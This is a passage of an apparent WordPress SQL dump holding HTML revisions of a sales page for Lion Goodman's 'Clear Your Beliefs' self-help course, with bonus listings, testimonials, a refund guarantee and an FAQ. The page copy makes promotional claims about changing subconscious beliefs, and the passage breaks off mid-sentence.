<em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n&nbsp;\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li>A complete set of PDF Transcripts of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 00:54:41', '2014-06-19 05:54:41', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1030, 2, '2014-06-19 00:51:56', '2014-06-19 05:51:56', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those 